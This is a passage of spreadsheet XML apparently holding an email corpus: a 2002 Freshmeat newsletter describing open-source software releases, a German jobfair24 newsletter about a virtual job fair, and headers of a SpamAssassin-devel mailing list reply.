sKaBurn 0.1 \n[083] - Station Location and Information 1.2 \n[084] - Sylpheed 0.8.1claws (Claws)\n[085] - Sympoll 1.3 \n[086] - The Big Dumb Finger Daemon 0.9.5 \n[087] - The Parma Polyhedra Library 0.4.1 \n[088] - The Tamber Project 1.0.6 \n[089] - Trackbox 0.4 \n[090] - tui-sh 1.2.0 \n[091] - uVNC 0.0-2 \n[092] - Valgrind 1.0.0 \n[093] - VNC Reflector 1.1.9 \n[094] - vpopmail 5.3.8 (Development)\n[095] - Vstr string library 0.9.9 \n[096] - WallFire wfconvert 0.1.3 \n[097] - WallFire wflogs 0.0.5 \n[098] - webcpp gtkgui 0.3.1 (Gnome)\n[099] - WebDialer 1.4 \n[100] - WebFileManager 0.972 (Stable)\n[101] - WebJob 1.2.0 \n[102] - white_dune 0.20beta12 (Development)\n[103] - WideStudio 3.00.3 \n[104] - Wolfpack 12.8.7 (Stable)\n[105] - XMLtype 0.5.1 (Development)\n[106] - Zina 0.9.1 \n[107] - zprommer 2002_07_29 \n\n\n  -----. - ----.-----. .- -.---. .- -. ..--- -.--------.   .-- . \n\n::: R E L E A S E   D E T A I L S :::\n\n[001] - abcm2ps 3.1.1 (Development)\n  by Guido Gonzato ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 03:48\n\nMultimedia :: Sound/Audio :: Conversion\n\nAbout: abcm2ps is a package that converts music tunes from ABC format to\nPostScript. Based on abc2ps version 1.2.5, it was developed mainly to\nprint baroque organ scores that have independant voices played on one or\nmore keyboards, and a pedal-board. It introduces many extensions to the\nABC language that make it suitable for classical music. \n\nChanges: Minor bugfixes were made.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[002] - amSynth 1.0 beta 5 \n  by nixx uk ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:52\n\nMultimedia :: Sound/Audio :: Sound Synthesis\n\nAbout: amSynth is a realtime polyphonic analogue modeling synthesizer. It\nprovides a virtual analogue synthesizer in the style of the classic Moog\nMinimoog/Roland Junos. It offers an easy-to-use interface and synth\nengine, while still creating varied sounds. It runs as a standalone\napplication, using either the ALSA audio and MIDI sequencer system or the\nplain OSS devices. It can be played with an external MIDI controller\nkeyboard, a software virtual keyboard, or through a MIDI sequencer. All\nparameters can be controlled over MIDI. \n\nChanges: The ALSA driver has been MMAPed for improved performance.\nRecordings are now output to .wav files. Minor performance tweaks have\nbeen made on the envelope generators, the build process, etc. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[003] - Calculating Pi First Release (Simple Harmonic Motion)\n  by Sayan Chakraborti ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 19:00\n\nScientific/Engineering :: Mathematics\nScientific/Engineering :: Visualization\n\nAbout: ProjectPi is a project to calculate the mathematical constant Pi\nthrough various methods. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[004] - CbDockApp 1.00 \n  by Chris Briscoe ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 18:56\n\nDesktop Environment :: Window Managers :: Window Maker :: Applets\n\nAbout: CbDockApp is a C++ dock application class. To make your own dock\napplication, just create a derived class with your application code. It\ncomes with an example docked clock application. \n\nLicense: BSD License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[005] - cdinsert and cdlabelgen 2.4.0 (Stable)\n  by Avinash Chopde ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 17:10\n\nText Processing\n\nAbout: cdlabelgen is a Perl script that generates printouts suitable for\nuse as CD jewel case inserts or CD envelopes. Both normal sized cases and\nslim cases are handled. cdlabelgen can be used to create table of contents\nfor music CDs, archival CDs, etc., with customizable logos or background\nimages, and it generates PostScript files as output. The package also\nincludes a Perl CGI Web script which accepts JPEG images as logos or\nbackgrounds, and can also create PDF output files.\n\nChanges: It is now possible to specify line width for the cover/tray edges\nor to omit edge lines entirely. Control over logo placement has been\nadded: logos can now be moved and scaled as required on the output.\nSupport for A4 page printouts has been added.\n\nLicense: BSD License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[006] - cdrecord 1.11a28 \n  by Jrg Schilling ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:53\n\nMultimedia :: Sound/Audio :: CD Audio :: CD Ripping\nMultimedia :: Sound/Audio :: CD Audio :: CD Writing\nSystem :: Archiving\n\nAbout: Cdrecord creates home-burned CDs with a CD-R/CD-RW recorder. It\nworks as a burn engine for several applications. Cdrecord supports CD\nrecorders from many different vendors; all SCSI-3/mmc and ATAPI/mmc\ncompliant drives should also work. Supported features include IDE/ATAPI,\nparallel-port, and SCSI drives, audio CDs, data CDs, and mixed CDs, full\nmulti-session support, CD-RWs (rewritable), TAO, DAO and human-readable\nerror messages. Cdrecord includes remote SCSI support and can access local\nor remote CD-writers.\n\nChanges: cdrecord now writes MCN/ISRC even in RAW mode. A bug that caused\ncdrecord to write wrong relative time stamps into the pregap of audio CDs\nwhen writing in RAW mode with pregapsize !=0 has been fixed. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[007] - Cell Phone SMS AIM 1.6 \n  by jason swan ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 20:32\n\nCommunications :: Chat\nCommunications :: Chat :: AOL Instant Messenger\nCommunications :: Internet Phone\n\nAbout: Cell Phone SMS AIM uses the Net::AIM Perl module available from\nCPAN, signs on a screen name, and routes messages to your cell phone via\nSMS. It also requires lynx. \n\nChanges: Two more providers and a bugfix. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[008] - CherryPy 0.4 \n  by Remi Delon ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:36\n\nInternet :: WWW/HTTP :: Dynamic Content\n\nAbout: CherryPy is a Python-based tool for developing dynamic Web sites.\nIt sits between a compiler and an application server. Compiling source\nfiles generates an executable containing everything to run the Web site,\nincluding an HTTP server. CherryPy lets you develop your Web site in an\nobject-oriented way, using both regular Python and a templating language.\nIt also comes with a handy standard library for things like cookie-based\nauthentication, form handling, HTTP authentication, etc.\n\nChanges: This release adds built-in caching capability and some compiler\noptimization. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[009] - Chronos 1.1.1 \n  by Simon Perreault ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 17:09\n\nInternet :: WWW/HTTP :: Dynamic Content\nOffice/Business :: Scheduling\n\nAbout: Chronos is a Web agenda calendar for intranets, although it can be\nused from anywhere. It can send reminders by email, and it allows you to\nschedule multi-user events. It is fast and light on resources. The balance\nbetween size and speed can be tweaked by tweaking mod_perl and Apache. \n\nChanges: This release fixes some bugs with the new holidays feature and a\ncrash that would occur sometimes when viewing events with reminders.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[010] - CLIP 0.99.4 \n  by Uri Hnykin ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 17:00\n\nDatabase\nDatabase :: Database Engines/Servers\nInternet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries\n\nAbout: CLIP is a Clipper/XBase compatible compiler with initial support\nfor FoxPro, Flagship, and CAVO syntax. It supports Linux, FreeBSD,\nOpenBSD, and Win32 (via Cygwin). It features support for international\nlanguages and character sets, including two-bytes character sets like\nChinese and Japanese. It also features OOP, a multiplatform GUI based on\nGTK/GTKextra, all SIX/Comix features (including hypertext indexing), SQL,\na C-API for third-party developers, a few wrappers for popular libraries\n(such as BZIP, GZIP, GD, Crypto, and Fcgi), multitasking, mouse events,\nand more.  \n\nChanges: There are many fixes for compatibility. An Interbase (Firebird)\nclient has been added. There are new FiveWin-like functions and classes.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[011] - countertrace 1.0 \n  by Michael C. Toren ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 00:43\n\nInternet\n\nAbout: countertrace is a userland iptables QUEUE  target handler for Linux\n2.4 kernels running  Netfilter. It attempts to give the illusion that \nthere are multiple, imaginary IP hops between  itself and the rest of the\nworld. The imaginary  hops that countertrace projects also have the \nability to introduce accumulative, imaginary  latency.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[012] - CRWInfo 0.2 \n  by Sven Riedel ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 18:37\n\nMultimedia :: Graphics :: Capture :: Digital Camera\n\nAbout: CRWInfo extracts thumbnails and exposure information from Canon's\nproprietary .crw RAW files, which can be output by certain of Canons\ndigital cameras.  \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[013] - DaDaBIK 2.1 beta \n  by Eugenio ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 18:36\n\nDatabase :: Front-Ends\n\nAbout: DaDaBIK is a PHP application that allows you to easily create a\nhighly customizable Web interface for a MySQL database in order to search,\ninsert, update, and delete records; all you need do is specify a few\nconfiguration parameters. It is available in English, Italian, Dutch,\nGerman, Spanish, and French. \n\nChanges: A new, lighter, and easier to use administration interface\n(related to the internal table manager) is now available. The form now has\na better layout, and all the fields are correctly aligned, including\ndates. All the translations are now up-to-date. It is now possible, for\nselect_single fields, to choose "other" during an insert and fill a\ntextbox by hand with an alternative value. That value will update the\nselect options, unless the option has been driven with a custom query\n("SQL:......"). It is now possible to choose whether a field has to be\ndisplayed on the details page. Other changes and bugfixes have been added.\n\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[014] - Danpei 2.8.2 (Stable)\n  by peace24 ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 11:01\n\n\n\nAbout: Danpei is a GTK+ based image viewer. It allows you to browse\nthrough your image files in thumbnail form, and it can rename, cut, and\npaste them easily with an interface similar to that of Windows Explorer. \n\nChanges: This release fixes the bug that caused the progressbar dialog to\nnot be displayed when dragging and dropping and the bug that, in some\ncases, caused Gtk-WARNING to be displayed when cutting and pasting. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[015] - dchub 0.1.2 \n  by Eric ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 05:32\n\nCommunications :: File Sharing\n\nAbout: dchub is a Direct Connect hub clone. It resembles an IRC server\nwith some extra features dedicated to file sharing. \n\nChanges: Minor bugs were fixed in the decoding of the MHUBLIST key, in the\nPerl script handling dc++ clients, and in the hub registration function.\nPython scripting was added.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[016] - Distributed Checksum Clearinghouse 1.1.8 \n  by Vernon Schryver ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 13:04\n\nCommunications :: Email\nCommunications :: Email :: Filters\n\nAbout: Distributed Checksum Clearinghouse (DCC) is a system of clients and\nservers that collect and count checksums related to mail messages. The\ncounts can be used by SMTP servers and mail user agents to detect and\nreject bulk mail. DCC servers can exchange common checksums. The checksums\ninclude values that are "fuzzy", or constant across common variations in\nbulk messages. \n\nChanges: A fix for "invalid database address" problems on SPARC systems,\nand other changes. \n\nLicense: Freely Distributable\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[017] - dnstracer 1.6 \n  by Edwin Groothuis ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:43\n\nInternet :: Name Service (DNS)\nSystem :: Networking\nUtilities\n\nAbout: dnstracer determines where a given Domain Name  Server (DNS) gets\nits information from, and follows  the chain of DNS servers back to the\nservers which  know the data. \n\nChanges: This release adds support for SOA records. \n\nLicense: BSD License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[018] - Document Manager 2.0-pre1 (Development)\n  by Dobrica Pavlinusic ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 05:28\n\nInternet :: WWW/HTTP\nInternet :: WWW/HTTP :: Site Management\nOffice/Business\n\nAbout: Document Manager is a document management system with the ability\nto check-in/check-out documents, track changes, and support multiple\nusers. It supports all usual operations (rename, delete, view, edit) and\ncomes with optional support for a secure HTTP server.\n\nChanges: This development release is probably not ready for production\nyet, but contains new features, including a repository which is not in the\nWeb server tree, an ACL implementation called trustee, and new\ndocumentation. It works with register_globals off in PHP.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[019] - dougnet 1.0 \n  by Doug ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 02:17\n\nInternet\n\nAbout: dougnet is a collection of useful functions to  helping programmers\nmake their programs  network enabled quickly and easily. It can be \ndirectly embedded into a program, creating no  hassle for users. It is\nhighly portable and very  easy to use.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[020] - Dump/Restore 0.4b31 \n  by Stelian Pop ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 12:57\n\nSystem :: Archiving :: Backup\nSystem :: Archiving :: Compression\nSystem :: Filesystems\n\nAbout: The dump package contains both dump and restore. Dump examines\nfiles in a filesystem, determines which ones need to be backed up, and\ncopies those files to a specified disk, tape or other storage medium. The\nrestore command performs the inverse function of dump; it can restore a\nfull backup of a filesystem. Subsequent incremental backups can then be\nlayered on top of the full backup. Single files and directory subtrees may\nalso be restored from full or partial backups.\n\nChanges: This release fixes a bug (introduced with 0.4b29) which prevented\nthe use of a remote tape drive. \n\nLicense: BSD License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[021] - DungeonMaker 2.01 \n  by henningsen ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 18:22\n\n\n\nAbout: The DungeonMaker is a program/class library that generates random\ndungeons and labyrinths using artificial life methods. It can be used for\npen-and-paper roleplaying, but is mostly intended to generate random maps\nfor computer role playing games. \n\nChanges: This is a complete rewrite that improves labyrinth creation and\nintroduces dungeon creation and placement of treasure and MOBs. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[022] - File Roller 2.0.0 \n  by HPG ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 06:19\n\nSystem :: Archiving\n\nAbout: File Roller is an archive manager for the GNOME environment. As an\narchive manager, it can create and modify archives, view the content of an\narchive, view a file contained in the archive, and extract files from the\narchive. File Roller is only a frontend (a graphical interface) to\narchiving programs like tar and zip. \n\nChanges: Ported to GNOME 2, added an option to view the destination folder\nafter extraction, rearranged the menus, and added mnemonics to all\ndialogs. Nautilus is now used as the document viewer.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[023] - FrontStella 1.2 \n  by James de Oliveira ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 00:11\n\nSystem :: Emulators\n\nAbout: FrontStella is a GNOME front-end for the xstella Atari emulator. It\nallows you to set and preserve a name and a screen shot for a particular\nROM. It also allows you to set and keep some global options for the\nemulator. You can add as many ROMs as you want.  \n\nChanges: Added keyboard shortcuts, and the ability to double-click on a\nROM. A pop-up menu was added, some known bugs were fixed, and the image is\nnow scaled to fit in the window.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[024] - gCVS 1.0b4 \n  by Karl-Heinz Bruenen ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 05:32\n\nSoftware Development :: Version Control\nSoftware Development :: Version Control :: CVS\n\nAbout: gCVS is a GTK port of WinCVS, a Windows-based CVS client.\n\nChanges: Serveral bugs were fixed.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[025] - gimp-print 4.2.2-pre4 (Stable)\n  by Robert Krawitz ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 21:38\n\nMultimedia :: Graphics\nPrinting\n\nAbout: Gimp-Print is a collection of very high quality printer drivers for\nUNIX/Linux. The goal of this project is uncompromising print quality and\nrobustness. Included with this package is the Print plugin for the GIMP\n(hence the name), a CUPS driver, and two drivers (traditional and\nIJS-based) for Ghostscript that may be compiled into that package. This\ndriver package is Foomatic-compatible and provides Foomatic data to enable\nplug and play with many print spoolers. In addition, various printer\nmaintenance utilities are included. Many users report that the quality of\nGimp-Print on high end Epson Stylus printers matches or exceeds the\nquality of the drivers supplied for Windows and Macintosh.\n\nChanges: This release fixes a serious and longstanding problem whereby\nprints to certain Epson printers hosted on a Windows system are\nincomplete; the bottom of the last page of the print is chopped off. There\nare also some minor tweaks for the Epson Stylus Photo 2100/2200. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[026] - gnocl 0.5.1 \n  by Peter G. Baum ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 17:17\n\nSoftware Development :: Widget Sets\n\nAbout: gnocl is a GTK / Gnome extension for the programming language Tcl.\nIt provides easy to use commands to quickly build Gnome compliant user\ninterfaces including the Gnome canvas widget and drag and drop support. It\nis loosely modeled after the Tk package.\n\nChanges: This release features many GTK+ 2.0 related bugfixes, a new tree\nand list widget, and dialogs for selecting color, font, and files. There\nis still no support for special Gnome 2.0 widgets (e.g. canvas).\n\nLicense: BSD License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[027] - GnomeICU 0.98.3 \n  by Patrick ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 18:03\n\nDesktop Environment :: Gnome\nSystem :: Networking\n\nAbout: GnomeICU is a Gnome application which allows one to communicate\nwith other GnomeICU users or others who use ICQ (Windows, Java, Mac, etc).\nWith GnomeICU, one can send and receive messages, change online modes,\nchat in realtime, send and receive URLs, and much more.\n\nChanges: A new XML contacts list file, better user authorization support,\nmore stable server side contacts list support, many other bugfixes, and\nsome new languages. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[028] - GNUstep 1.4.0 (LaunchPad)\n  by Adam Fedor ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 00:31\n\nDesktop Environment :: GNUstep\n\nAbout: GNUstep is a set of general-purpose Objective-C libraries based on\nthe OpenStep standard developed by NeXT (now Apple) Inc. The libraries\nconsist of everything from foundation classes, such as dictionaries and\narrays, to GUI interface classes such as windows, sliders, buttons, etc.\n\nChanges: The Make package has gone through an extensive reorganization,\nallowing for better code sharing and a speed increase by at least a factor\nof 2. The Base library now works better on Windows and Darwin, and has\nbetter language support.\n\nLicense: GNU Lesser General Public License (LGPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[029] - grocget 0.5 \n  by Anthony Tekatch ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 22:57\n\nUtilities\n\nAbout: grocget helps you shop for groceries faster and more reliably. It\ncan print a master inventory list, as well as an aisle-sorted shopping\nlist. \n\nChanges: Changes for using with Python 2.0, and changes to allow running\nfrom current directory. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[030] - hdup 1.4.0-1 (Stable)\n  by Miek Gieben ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 05:50\n\nSystem :: Archiving :: Backup\nSystem :: Archiving :: Compression\n\nAbout: hdup is used to back up a filesystem. Features include encryption\nof the archive (via mcrypt), compression of the archive (bzip/gzip/none),\nthe ability to transfer the archive to a remote host (via scp), and no\nobscure archive format (it is a normal compressed tar file).\n\nChanges: Added a -f option to force restoring to '/', and made\ndocumentation cleanups. Restoring a single file is now possible, and\ncompilation now depends on GNU make.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[031] - Highlight 0.1 \n  by Andr Simon ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:36\n\nText Processing\n\nAbout: Highlight is a universal source code to HTML, XHTML, RTF, or\n(La)TEX converter. (X)HTML output is formatted by Cascading Style Sheets.\nIt supports Bash, C, C++, Java, Javascript, Lua, Assembler, Perl, PHP,\nPL/SQL, (Object) Pascal, and Visual Basic files. It's possible to easily\nenhance Highlight's parsing database. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[032] - honeyd 0.3 \n  by Niels Provos ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 12:47\n\nInternet\nSystem :: Monitoring\n\nAbout: Honeyd is a small daemon that creates virtual hosts on a network.\nThe hosts can be configured to run arbitrary services, and their TCP\npersonality can be adapted so that they appear to be running certain\nversions of operating systems. Honeyd enables a single host to claim\nmultiple addresses on a LAN for network simulation. It is possible to ping\nthe virtual machines, or to traceroute them. Any type of service on the\nvirtual machine can be simulated according to a simple configuration file.\nInstead of simulating a service, it is also possible to proxy it to\nanother machine.\n\nChanges: UDP support (including proxying), and many bugfixes. \n\nLicense: BSD License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[033] - ioperm for Cygwin 0.1 \n  by Marcel Telka ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:55\n\nSoftware Development :: Libraries\n\nAbout: ioperm for Cygwin adds support for the ioperm() function to Cygwin\n(for Windows NT/2000/XP). This support includes sys/io.h and sys/perm.h\nheader files (not included in Cygwin by default) with development and\nruntime libraries. \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[034] - IPSquad Packages From Scratch 0.6 \n  by Er-Vin ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 05:58\n\nSystem :: Archiving :: Packaging\nSystem :: Installation/Setup\nSystem :: Logging\n\nAbout: IPFS (IPSquad Package From Source) is a system which allows you to\ntrace an program's installation from sources and register it in your\nfavorite packaging system. (Only Slackware 8.1 is currently supported.)\nIPFS watches a command (generally make install), collects the list of\nadded files, and then registers them in the chosen packaging system as if\nthe install was made from a normal package. Unlike other similar products,\nIPFS is able to track both shared and statically linked programs. A\nSlackware 8.1 package for IPFS is available for download. \n\nChanges: The old resolve_path shell script has been replace with a newer\nand faster ipfs_realpath coded in C.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[035] - j 0.16.1 \n  by Peter Graves ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 16:58\n\nText Editors\n\nAbout: J is a multifile, multiwindow programmer's editor written entirely\nin Java. It features syntax highlighting for Java, C, C++, XML, HTML, CSS,\nJavaScript, Lisp, Perl, PHP, Python, Ruby, Scheme, Tcl/Tk, Verilog, and\nVHDL, automatic indentation, directory buffers, regular expressions,\nmultifile find and replace, autosave and crash recovery, undo/redo, and\nFTP/HTTP support. All keyboard mappings can be customized. Themes may be\nused to customize the editor's appearance.\n\nChanges: This release adds support for named sessions.\n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[036] - jmame 0.3-beta \n  by Joe Ceklosky ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 23:05\n\n\n\nAbout: yyyyame is a Java-based frontend to XMAME. It uses the Swing toolkit\nand uses XML to store all settings.\n\nChanges: A new abiltiy to verify ROMs using XMAME was added. The status\narea also displays XMAME verify commands and output. make install and make\nuninstall commands were also added to the Makefile (edit the Makefile to\nchange the default install location, which is /usr/local/jmame)  \n\nLicense: GNU General Public License (GPL)\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[037] - Kadmos OCR/ICR engine 3.5q \n  by Tamas Nagy ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 18:21\n\nMultimedia :: Graphics\nSoftware Development :: Libraries\n\nAbout: The Kadmos OCR/ICR (handwriting) recognition engine has multiple\nlanguages support (it covers all Latin languages plus others). Interfaces\nare available for C/C++/VB/Delphi, and Java upon request. It also has\nisolated character (REC), isolated line (REL), and paragraph (REP)\nrecognition modules. \n\nChanges: New image manipulation functions were added to the API. \n\nLicense: Other/Proprietary License\n\nURL: [URL]http://freshmeat.net[/URL]\n\n                        - %  - %  - % - % -\n\n[038] - Kallers 0.2.2 \n  by Nadeem Hasan ([URL]http://freshmeat.net[/URL]\n  Tuesday, July 30th 2002 10:57\n\nCommunications :: Telephony\nDesktop Environment :: K Desktop Environment (KDE)\n\nAbout: Kallers is KDE system tray applet that displays  the caller ID\ninformation sent by phone  companies. It requires a caller ID capable \nmodem. It logs every call internally using an  XML format, displays call\ninfomation non- intrusively using a popup window, a</t>
  </si>
  <si>
    <t>http://freshmeat.net http://www.usenix.org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http://freshmeat.net www.batronix.com http://freshmeat.net http://lists.freshmeat.net</t>
  </si>
  <si>
    <t>To: "Xxxxxxxxx.Yyyyyyy@web.de" &lt;Xxxxxxxxx.Yyyyyyy@web.de&gt;\nFrom: "jobfair24 " &lt;newsletter@jobfair24.de&gt;\nDate: Wed, 3 Jul 2002 1:19:14 +0200</t>
  </si>
  <si>
    <t>Wed, 3 Jul 2002 1:19:14 +0200</t>
  </si>
  <si>
    <t>"jobfair24 " &lt;newsletter@jobfair24.de&gt;</t>
  </si>
  <si>
    <t>"Xxxxxxxxx.Yyyyyyy@web.de" &lt;Xxxxxxxxx.Yyyyyyy@web.de&gt;</t>
  </si>
  <si>
    <t>Jobs, Jobs, Jobs: HEUTE, 03.07.02 ist virtueller Messetag der jobfair24!!!</t>
  </si>
  <si>
    <t>Hallo Xxxxxxxxx Yyyyyyy,\n\nHEUTE, 03. Juli, ist monatlicher Messetag der virtuellen 3D-Job-Messe!!\nIhre Chance, die Weichen fuer einen erfolgreichen Berufsein- und\nKarriereaufstieg zu stellen.\nZwischen 13 und 18 Uhr erwarten Sie HEUTE die Personalmanager zahlreicher\nUnternehmen, die Stellen fuer engagierte neue Mitarbeitern anbieten.\n\nDieser Link fuehrt Sie direkt in die 3D-Messehalle! (Falls Sie noch keine\n3D-Software haben, koennen Sie sie hier mit einem Klick installieren):\n[URL]http://www.jobfair24.de[/URL]\n\n\nDieser Link fuehrt in die 2D-Ansicht der jobfair24 (keine 3D-Software\nnoetig):\n[URL]http://www.jobfair24.de[/URL]\n\n\nViel Spass und Erfolg auf der jobfair24!\n\nAlso kommen Sie vorbei, wir freun uns!\nIhr jobfair24-Team\n\n--------------\nInfos zum Newsletter: \n-------\nDieser Newsletter wurde versendet an: Xxxxxxxxx.Yyyyyyy@web.de \n\nFalls Sie Fragen haben, Hilfe benoetigen bzw. Anregungen oder Kritik\naeussern wollen (oder vielleicht ein kleines Lob :-)), wenden Sie sich\nbitte an: newsletter@jobfair24.de Wenn Sie den Newsletter wieder\nabbestellen wollen, klicken Sie hier:\n[URL]http://www.jobfair24.de[/URL]\nFalls Sie diesen Newsletter durch einen Freund erhalten haben und ihn gerne\nabonnieren wuerden:\n[URL]http://www.jobfair24.de[/URL] \nEs kann leider hin und wieder passieren, dass durch fehlerhafte\nEintragungen von E-Mail Adressen Mails falsch zugestellt werden. Dies ist\nnatuerlich unbeabsichtigt... Um sich aus der Liste zu loeschen einfach hier\nklicken: [URL]http://www.jobfair24.de[/URL] oder\nbesuchen Sie uns doch einmal auf unserer Homepage\n[URL]http://www.jobfair24.de[/URL] und lassen Sie sich vom Flair der\nweltweit ersten virtuellen 3D-Job-Messe begeistern!</t>
  </si>
  <si>
    <t>http://www.jobfair24.de http://www.jobfair24.de http://www.jobfair24.de http://www.jobfair24.de http://www.jobfair24.de http://www.jobfair24.de</t>
  </si>
  <si>
    <t>To: SpamAssassin-devel@example.sourceforge.net\nFrom: Klaus Heinz &lt;k.heinz.aug.zwei@onlinehome.de&gt;\nDate: Wed, 28 Aug 2002 22:53:52 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 22:53:52 +0200</t>
  </si>
  <si>
    <t>Klaus Heinz &lt;k.heinz.aug.zwei@onlinehome.de&gt;</t>
  </si>
  <si>
    <t>SpamAssassin-devel@example.sourceforge.net</t>
  </si>
  <si>
    <t>Re: [SAdev] 2.40: ready for release?</t>
  </si>
  <si>
